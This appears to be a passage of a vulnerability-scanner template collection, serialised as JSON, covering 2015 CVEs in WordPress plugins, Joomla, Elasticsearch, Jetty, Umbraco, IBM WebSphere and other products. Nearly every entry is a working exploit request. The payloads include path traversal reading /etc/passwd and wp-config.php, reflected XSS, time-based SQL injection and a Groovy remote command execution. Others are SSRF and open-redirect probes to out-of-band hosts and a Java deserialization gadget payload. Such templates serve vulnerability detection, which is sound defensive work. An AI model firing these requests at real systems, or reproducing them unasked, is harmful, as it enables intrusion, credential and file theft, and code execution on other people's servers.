Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5469","info":{"name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4414","info":{"name":"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5688","info":{"name":"Geddy <13.0.8 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4074","info":{"name":"Joomla! Helpdesk Pro plugin <1.4.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-6544","info":{"name":"Combodo iTop <2.2.0-2459 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9414","info":{"name":"WordPress Symposium <=15.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7245","info":{"name":"D-Link DVG-N5402SP - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /cgibin/webproc HTTP/1.1\nHost: {{Hostname}}\n\ngetpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2015-4062","info":{"name":"WordPress NewStatPress 0.9.8 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body_2, \"newstatpress_page_nsp_search\")"],"condition":"and"}]}]},{"id":"CVE-2015-4127","info":{"name":"WordPress Church Admin <0.810 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4632","info":{"name":"Koha 3.20.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-3648","info":{"name":"ResourceSpace - Local File inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9480","info":{"name":"WordPress RobotCPA 5 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1427","info":{"name":"ElasticSearch - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /website/blog/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n  \"name\": \"test\"\n}\n","POST /_search HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\n{\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5461","info":{"name":"WordPress StageShow <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2015-7377","info":{"name":"WordPress Pie-Register <2.0.19 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7297","info":{"name":"Joomla! Core SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2015-8813","info":{"name":"Umbraco <7.4.0- Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2015-2166","info":{"name":"Ericsson Drutt MSDP - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5471","info":{"name":"Swim Team <= v1.44.10777 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1880","info":{"name":"Fortinet FortiOS <=5.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('{{randstr}}')</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2863","info":{"name":"Kaseya Virtual System Administrator - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/inc/supportLoad.asp?urlToLoad=http://oast.me","{{BaseURL}}/vsaPres/Web20/core/LocalProxy.ashx?url=http://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-1579","info":{"name":"WordPress Slider Revolution - Local File Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_NAME'","'DB_PASSWORD'","'DB_USER'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7780","info":{"name":"ManageEngine Firewall Analyzer <8.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-5354","info":{"name":"Novius OS 5.0.1-elche - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2015-6920","info":{"name":"WordPress sourceAFRICA <=0.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-9323","info":{"name":"404 to 301 <= 2.0.2 - Authenticated Blind SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"404-to-301\")"],"condition":"and"}]}]},{"id":"CVE-2015-6477","info":{"name":"Nordex NC2  - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert('{{randstr}}')</script>"]}]}]},{"id":"CVE-2015-2996","info":{"name":"SysAid Help Desk <15.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd","{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-8349","info":{"name":"SourceBans <2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2080","info":{"name":"Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"headers":{"Referer":"\\x00"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Illegal character 0x0 in state"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2015-3337","info":{"name":"Elasticsearch - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2807","info":{"name":"Navis DocumentCloud <0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000010","info":{"name":"WordPress Simple Image Manipulator < 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-2067","info":{"name":"Magento Server MAGMI - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-4050","info":{"name":"Symfony - Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Credits"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-1000005","info":{"name":"WordPress Candidate Application Form <= 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2015-7450","info":{"name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=utf-8\nSOAPAction: \"urn:AdminService\"\n\n<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\n<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">{{ generate_java_gadget(\"dns\", \"{{interactsh-url}}\", \"base64-raw\")}}</params>\n<signature 